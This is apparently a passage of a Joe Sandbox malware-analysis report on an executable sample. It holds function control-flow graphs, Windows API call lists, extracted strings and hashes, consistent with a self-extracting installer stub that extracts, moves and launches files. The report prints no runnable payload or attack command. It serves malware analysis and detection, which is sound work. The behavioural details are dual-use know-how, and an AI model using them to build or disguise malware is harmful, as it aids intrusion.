                                                                                                                        • Instruction Fuzzy Hash: AA422871940248BEEB21AB71DD4AFBE77BCAB0A704F145056F640BA1D3CB756E48CB21
                                                                                                                        Function 00EA0863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 269 ea0863-ea0886 call eaec50 GetModuleHandleW 272 ea0888-ea089f GetProcAddress 269->272 273 ea08e7-ea0b48 269->273 276 ea08b9-ea08c9 GetProcAddress 272->276 277 ea08a1-ea08b7 272->277 274 ea0b4e-ea0b59 call eb75fb 273->274 275 ea0c14-ea0c40 GetModuleFileNameW call e9c29a call ea0602 273->275 274->275 286 ea0b5f-ea0b8d GetModuleFileNameW CreateFileW 274->286 291 ea0c42-ea0c4e call e9b146 275->291 280 ea08cb-ea08e0 276->280 281 ea08e5 276->281 277->276 280->281 281->273 289 ea0c08-ea0c0f CloseHandle 286->289 290 ea0b8f-ea0b9b SetFilePointer 286->290 289->275 290->289 292 ea0b9d-ea0bb9 ReadFile 290->292 298 ea0c7d-ea0ca4 call e9c310 GetFileAttributesW 291->298 299 ea0c50-ea0c5b call ea081b 291->299 292->289 295 ea0bbb-ea0be0 292->295 297 ea0bfd-ea0c06 call ea0371 295->297 297->289 306 ea0be2-ea0bfc call ea081b 297->306 309 ea0cae 298->309 310 ea0ca6-ea0caa 298->310 299->298 308 ea0c5d-ea0c7b CompareStringW 299->308 306->297 308->298 308->310 311 ea0cb0-ea0cb5 309->311 310->291 313 ea0cac 310->313 314 ea0cec-ea0cee 311->314 315 ea0cb7 311->315 313->311 317 ea0dfb-ea0e05 314->317 318 ea0cf4-ea0d0b call e9c2e4 call e9b146 314->318 316 ea0cb9-ea0ce0 call e9c310 GetFileAttributesW 315->316 323 ea0cea 316->323 324 ea0ce2-ea0ce6 316->324 328 ea0d0d-ea0d6e call ea081b * 2 call e9e617 call e94092 call e9e617 call eaa7e4 318->328 329 ea0d73-ea0da6 call e94092 AllocConsole 318->329 323->314 324->316 326 ea0ce8 324->326 326->314 336 ea0df3-ea0df5 ExitProcess 328->336 335 ea0da8-ea0ded GetCurrentProcessId AttachConsole call eb3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 329->335 329->336 335->336
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 00EA087C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EA088E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EA08BF
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00EA0B69
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EA0B83
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EA0B93
                                                                                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,|<,00000000), ref: 00EA0BB1
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EA0C09
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00EA0C1E
                                                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<,?,00000000,?,00000800), ref: 00EA0C72
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00EA0C9C
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,D=,00000800), ref: 00EA0CD8
                                                                                                                          • Part of subcall function 00EA081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EA0836
                                                                                                                          • Part of subcall function 00EA081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E9F2D8,Crypt32.dll,00000000,00E9F35C,?,?,00E9F33E,?,?,?), ref: 00EA0858
                                                                                                                        • _swprintf.LIBCMT ref: 00EA0D4A
                                                                                                                        • _swprintf.LIBCMT ref: 00EA0D96
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • AllocConsole.KERNEL32 ref: 00EA0D9E
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00EA0DA8
                                                                                                                        • AttachConsole.KERNEL32(00000000), ref: 00EA0DAF
                                                                                                                        • _wcslen.LIBCMT ref: 00EA0DC4
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00EA0DD5
                                                                                                                        • WriteConsoleW.KERNEL32(00000000), ref: 00EA0DDC
                                                                                                                        • Sleep.KERNEL32(00002710), ref: 00EA0DE7
                                                                                                                        • FreeConsole.KERNEL32 ref: 00EA0DED
                                                                                                                        • ExitProcess.KERNEL32 ref: 00EA0DF5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                        • String ID: (=$,<$,@$0?$0A$4B$8>$D=$DXGIDebug.dll$H?$H@$HA$P>$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=$`@$d?$dA$dwmapi.dll$h=$h>$kernel32$uxtheme.dll$|<$|?$|@$<$>$?$@$A
                                                                                                                        • API String ID: 1207345701-31210346
                                                                                                                        • Opcode ID: e1318f0a6498e2fbd8b2d4b51a7d79ea726878adbee6accc19b66a6a42ba71a6
                                                                                                                        • Instruction ID: d6e6fa839fc31422bd9726c47fba54b02509fc283123460e2885951ecc8721a8
                                                                                                                        • Opcode Fuzzy Hash: e1318f0a6498e2fbd8b2d4b51a7d79ea726878adbee6accc19b66a6a42ba71a6
                                                                                                                        • Instruction Fuzzy Hash: F1D175B1008384AFD7319F60C94AFDFBAE8BBC5704F50A91DF185BA150C772964ACB62
                                                                                                                        Function 00EAC73F Relevance: 49.4, APIs: 23, Strings: 5, Instructions: 428windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 348 eac73f-eac757 call eaeb78 call eaec50 353 ead40d-ead418 348->353 354 eac75d-eac787 call eab314 348->354 354->353 357 eac78d-eac792 354->357 358 eac793-eac7a1 357->358 359 eac7a2-eac7b7 call eaaf98 358->359 362 eac7b9 359->362 363 eac7bb-eac7d0 call ea1fbb 362->363 366 eac7dd-eac7e0 363->366 367 eac7d2-eac7d6 363->367 369 ead3d9-ead404 call eab314 366->369 370 eac7e6 366->370 367->363 368 eac7d8 367->368 368->369 369->358 385 ead40a-ead40c 369->385 371 eac9be-eac9c0 370->371 372 eaca5f-eaca61 370->372 373 eaca7c-eaca7e 370->373 374 eac7ed-eac7f0 370->374 371->369 378 eac9c6-eac9d2 371->378 372->369 376 eaca67-eaca77 SetWindowTextW 372->376 373->369 377 eaca84-eaca8b 373->377 374->369 379 eac7f6-eac850 call eaa64d call e9bdf3 call e9a544 call e9a67e call e96edb 374->379 376->369 377->369 381 eaca91-eacaaa 377->381 382 eac9e6-eac9eb 378->382 383 eac9d4-eac9e5 call eb7686 378->383 436 eac98f-eac9a4 call e9a5d1 379->436 386 eacaac 381->386 387 eacab2-eacac0 call eb3e13 381->387 390 eac9ed-eac9f3 382->390 391 eac9f5-eaca00 call eab48e 382->391 383->382 385->353 386->387 387->369 405 eacac6-eacacf 387->405 392 eaca05-eaca07 390->392 391->392 398 eaca09-eaca10 call eb3e13 392->398 399 eaca12-eaca32 call eb3e13 call eb3e3e 392->399 398->399 425 eaca4b-eaca4d 399->425 426 eaca34-eaca3b 399->426 409 eacaf8-eacafb 405->409 410 eacad1-eacad5 405->410 411 eacb01-eacb04 409->411 414 eacbe0-eacbee call ea0602 409->414 410->411 412 eacad7-eacadf 410->412 419 eacb11-eacb2c 411->419 420 eacb06-eacb0b 411->420 412->369 417 eacae5-eacaf3 call ea0602 412->417 427 eacbf0-eacc04 call eb279b 414->427 417->427 437 eacb2e-eacb68 419->437 438 eacb76-eacb7d 419->438 420->414 420->419 425->369 428 eaca53-eaca5a call eb3e2e 425->428 432 eaca3d-eaca3f 426->432 433 eaca42-eaca4a call eb7686 426->433 447 eacc11-eacc62 call ea0602 call eab1be GetDlgItem SetWindowTextW SendMessageW call eb3e49 427->447 448 eacc06-eacc0a 427->448 428->369 432->433 433->425 454 eac9aa-eac9b9 call e9a55a 436->454 455 eac855-eac869 SetFileAttributesW 436->455 471 eacb6a 437->471 472 eacb6c-eacb6e 437->472 441 eacbab-eacbce call eb3e13 * 2 438->441 442 eacb7f-eacb97 call eb3e13 438->442 441->427 476 eacbd0-eacbde call ea05da 441->476 442->441 458 eacb99-eacba6 call ea05da 442->458 482 eacc67-eacc6b 447->482 448->447 453 eacc0c-eacc0e 448->453 453->447 454->369 460 eac90f-eac91f GetFileAttributesW 455->460 461 eac86f-eac8a2 call e9b991 call e9b690 call eb3e13 455->461 458->441 460->436 469 eac921-eac930 DeleteFileW 460->469 492 eac8a4-eac8b3 call eb3e13 461->492 493 eac8b5-eac8c3 call e9bdb4 461->493 469->436 475 eac932-eac935 469->475 471->472 472->438 479 eac939-eac965 call e94092 GetFileAttributesW 475->479 476->427 488 eac937-eac938 479->488 489 eac967-eac97d MoveFileW 479->489 482->369 487 eacc71-eacc85 SendMessageW 482->487 487->369 488->479 489->436 491 eac97f-eac989 MoveFileExW 489->491 491->436 492->493 498 eac8c9-eac908 call eb3e13 call eafff0 492->498 493->454 493->498 498->460
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00EAC744
                                                                                                                          • Part of subcall function 00EAB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00EAB3FB
                                                                                                                          • Part of subcall function 00EAAF98: _wcschr.LIBVCRUNTIME ref: 00EAB033
                                                                                                                        • _wcslen.LIBCMT ref: 00EACA0A
                                                                                                                        • _wcslen.LIBCMT ref: 00EACA13
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00EACA71
                                                                                                                        • _wcslen.LIBCMT ref: 00EACAB3
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00EACBFB
                                                                                                                        • GetDlgItem.USER32(?,00000066), ref: 00EACC36
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00EACC46
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,00EDA472), ref: 00EACC54
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EACC7F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$
                                                                                                                        • API String ID: 986293930-3342974870
                                                                                                                        • Opcode ID: c1e4f10038d55994c61724562fb8bcf4023918298e4c2f63c374c24672cfffdf
                                                                                                                        • Instruction ID: e0ea0f4ecfa45e934882983c097ae64e02bb9187da2577574ee793a96edf5796
                                                                                                                        • Opcode Fuzzy Hash: c1e4f10038d55994c61724562fb8bcf4023918298e4c2f63c374c24672cfffdf
                                                                                                                        • Instruction Fuzzy Hash: FFE16672900258AADF24DB60DD85EEF73BCAF49314F1454A6F54AF7040EB74AF448B61
                                                                                                                        Function 00E9DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E9DA70
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00E9DA91
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E9DAAC
                                                                                                                          • Part of subcall function 00E9C29A: _wcslen.LIBCMT ref: 00E9C2A2
                                                                                                                          • Part of subcall function 00EA05DA: _wcslen.LIBCMT ref: 00EA05E0
                                                                                                                          • Part of subcall function 00EA1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E9BAE9,00000000,?,?,?,0001043A), ref: 00EA1BA0
                                                                                                                        • _wcslen.LIBCMT ref: 00E9DDE9
                                                                                                                        • __fprintf_l.LIBCMT ref: 00E9DF1C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9
                                                                                                                        • API String ID: 557298264-1836506137
                                                                                                                        • Opcode ID: 9db68ba05f633254b914bd61ec619b6ea4f8f00dc32c99bea5fef1d586dd6fe5
                                                                                                                        • Instruction ID: ed0393b34b47deef86205ddce960e23854f86da7383fd9374793129940f2fa78
                                                                                                                        • Opcode Fuzzy Hash: 9db68ba05f633254b914bd61ec619b6ea4f8f00dc32c99bea5fef1d586dd6fe5
                                                                                                                        • Instruction Fuzzy Hash: 7232C071904218EACF24EF68CC42BEE77A5FF48304F40655AFA05BB291EBB19D85CB50
                                                                                                                        Function 00EAD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EAB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EAB579
                                                                                                                          • Part of subcall function 00EAB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAB58A
                                                                                                                          • Part of subcall function 00EAB568: IsDialogMessageW.USER32(0001043A,?), ref: 00EAB59E
                                                                                                                          • Part of subcall function 00EAB568: TranslateMessage.USER32(?), ref: 00EAB5AC
                                                                                                                          • Part of subcall function 00EAB568: DispatchMessageW.USER32(?), ref: 00EAB5B6
                                                                                                                        • GetDlgItem.USER32(00000068,00EEFCB8), ref: 00EAD4E8
                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00EAAF07,00000001,?,?,00EAB7B9,00EC506C,00EEFCB8,00EEFCB8,00001000,00000000,00000000), ref: 00EAD510
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00EAD51B
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00EC35F4), ref: 00EAD529
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EAD53F
                                                                                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00EAD559
                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EAD59D
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00EAD5AB
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EAD5BA
                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EAD5E1
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00EC43F4), ref: 00EAD5F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                        • String ID: \
                                                                                                                        • API String ID: 3569833718-2967466578
                                                                                                                        • Opcode ID: c10df23d60dff0683cbf48971b406a7c7d9597a0a33c43605358c4dc21f8bdda
                                                                                                                        • Instruction ID: ad53918e07b5ac4198566bcec8d6311b0245557a4b79816818f60a9adc46f6a2
                                                                                                                        • Opcode Fuzzy Hash: c10df23d60dff0683cbf48971b406a7c7d9597a0a33c43605358c4dc21f8bdda
                                                                                                                        • Instruction Fuzzy Hash: F431B171145342BFE301DF35EC4AFAB7FACEB86708F00050AF551A61A1DB659A09C776
                                                                                                                        Function 00EAD78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 838 ead78f-ead7a7 call eaec50 841 ead9e8-ead9f0 838->841 842 ead7ad-ead7b9 call eb3e13 838->842 842->841 845 ead7bf-ead7e7 call eafff0 842->845 848 ead7e9 845->848 849 ead7f1-ead7ff 845->849 848->849 850 ead812-ead818 849->850 851 ead801-ead804 849->851 853 ead85b-ead85e 850->853 852 ead808-ead80e 851->852 855 ead810 852->855 856 ead837-ead844 852->856 853->852 854 ead860-ead866 853->854 857 ead868-ead86b 854->857 858 ead86d-ead86f 854->858 859 ead822-ead82c 855->859 860 ead84a-ead84e 856->860 861 ead9c0-ead9c2 856->861 857->858 863 ead882-ead898 call e9b92d 857->863 858->863 864 ead871-ead878 858->864 865 ead81a-ead820 859->865 866 ead82e 859->866 862 ead9c6 860->862 867 ead854-ead859 860->867 861->862 871 ead9cf 862->871 874 ead89a-ead8a7 call ea1fbb 863->874 875 ead8b1-ead8bc call e9a231 863->875 864->863 868 ead87a 864->868 865->859 870 ead830-ead833 865->870 866->856 867->853 868->863 870->856 873 ead9d6-ead9d8 871->873 876 ead9da-ead9dc 873->876 877 ead9e7 873->877 874->875 883 ead8a9 874->883 884 ead8d9-ead8dd 875->884 885 ead8be-ead8d5 call e9b6c4 875->885 876->877 880 ead9de-ead9e1 ShowWindow 876->880 877->841 880->877 883->875 888 ead8e4-ead8e6 884->888 885->884 888->877 889 ead8ec-ead8f9 888->889 890 ead8fb-ead902 889->890 891 ead90c-ead90e 889->891 890->891 892 ead904-ead90a 890->892 893 ead910-ead919 891->893 894 ead925-ead944 call eadc3b 891->894 892->891 895 ead97b-ead987 CloseHandle 892->895 893->894 903 ead91b-ead923 ShowWindow 893->903 894->895 907 ead946-ead94e 894->907 896 ead998-ead9a6 895->896 897 ead989-ead996 call ea1fbb 895->897 896->873 902 ead9a8-ead9aa 896->902 897->871 897->896 902->873 906 ead9ac-ead9b2 902->906 903->894 906->873 908 ead9b4-ead9be 906->908 907->895 909 ead950-ead961 GetExitCodeProcess 907->909 908->873 909->895 910 ead963-ead96d 909->910 911 ead96f 910->911 912 ead974 910->912 911->912 912->895
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00EAD7AE
                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00EAD8DE
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00EAD91D
                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00EAD959
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EAD97F
                                                                                                                        • ShowWindow.USER32(?,00000001), ref: 00EAD9E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                        • String ID: .exe$.inf$PDu<$h$r
                                                                                                                        • API String ID: 36480843-2155249188
                                                                                                                        • Opcode ID: b87f4121764fa43cfa8532b67d07b579e0aec4a023a52aa0eeee043a59858990
                                                                                                                        • Instruction ID: 53088602ecda8347c9fbba5ed4059e40e9df6c1e8f07a48be4fe11d013f1c5ba
                                                                                                                        • Opcode Fuzzy Hash: b87f4121764fa43cfa8532b67d07b579e0aec4a023a52aa0eeee043a59858990
                                                                                                                        • Instruction Fuzzy Hash: A051E43000C3849EDB209B259C44BABBBE4AF8B748F04241EF4C2BF591E7B5E948C752
                                                                                                                        Function 00EBA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 913 eba95b-eba974 914 eba98a-eba98f 913->914 915 eba976-eba986 call ebef4c 913->915 917 eba99c-eba9c0 MultiByteToWideChar 914->917 918 eba991-eba999 914->918 915->914 922 eba988 915->922 920 ebab53-ebab66 call eafbbc 917->920 921 eba9c6-eba9d2 917->921 918->917 923 ebaa26 921->923 924 eba9d4-eba9e5 921->924 922->914 926 ebaa28-ebaa2a 923->926 927 eba9e7-eba9f6 call ec2010 924->927 928 ebaa04-ebaa15 call eb8e06 924->928 930 ebab48 926->930 931 ebaa30-ebaa43 MultiByteToWideChar 926->931 927->930 941 eba9fc-ebaa02 927->941 928->930 938 ebaa1b 928->938 936 ebab4a-ebab51 call ebabc3 930->936 931->930 935 ebaa49-ebaa5b call ebaf6c 931->935 943 ebaa60-ebaa64 935->943 936->920 942 ebaa21-ebaa24 938->942 941->942 942->926 943->930 945 ebaa6a-ebaa71 943->945 946 ebaaab-ebaab7 945->946 947 ebaa73-ebaa78 945->947 948 ebaab9-ebaaca 946->948 949 ebab03 946->949 947->936 950 ebaa7e-ebaa80 947->950 951 ebaacc-ebaadb call ec2010 948->951 952 ebaae5-ebaaf6 call eb8e06 948->952 953 ebab05-ebab07 949->953 950->930 954 ebaa86-ebaaa0 call ebaf6c 950->954 958 ebab41-ebab47 call ebabc3 951->958 965 ebaadd-ebaae3 951->965 952->958 967 ebaaf8 952->967 957 ebab09-ebab22 call ebaf6c 953->957 953->958 954->936 969 ebaaa6 954->969 957->958 970 ebab24-ebab2b 957->970 958->930 971 ebaafe-ebab01 965->971 967->971 969->930 972 ebab2d-ebab2e 970->972 973 ebab67-ebab6d 970->973 971->953 974 ebab2f-ebab3f WideCharToMultiByte 972->974 973->974 974->958 975 ebab6f-ebab76 call ebabc3 974->975 975->936
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00EB5695,00EB5695,?,?,?,00EBABAC,00000001,00000001,2DE85006), ref: 00EBA9B5
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00EBABAC,00000001,00000001,2DE85006,?,?,?), ref: 00EBAA3B
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00EBAB35
                                                                                                                        • __freea.LIBCMT ref: 00EBAB42
                                                                                                                          • Part of subcall function 00EB8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EBCA2C,00000000,?,00EB6CBE,?,00000008,?,00EB91E0,?,?,?), ref: 00EB8E38
                                                                                                                        • __freea.LIBCMT ref: 00EBAB4B
                                                                                                                        • __freea.LIBCMT ref: 00EBAB70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1414292761-0
                                                                                                                        • Opcode ID: 2ebe99ef3d6890e901ce82fb0321f2c17e181679e9dbedf4813c316ac91a5b3f
                                                                                                                        • Instruction ID: fdb670012d72872c08f139fe4f23c269b6d323f06717fcfed10b5201b8778f48
                                                                                                                        • Opcode Fuzzy Hash: 2ebe99ef3d6890e901ce82fb0321f2c17e181679e9dbedf4813c316ac91a5b3f
                                                                                                                        • Instruction Fuzzy Hash: 1E51BF72600216AFDF258E64CC82EFBB7AAEB44754B19563DFC14F6150EB34DC40D6A2
                                                                                                                        Function 00EB3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
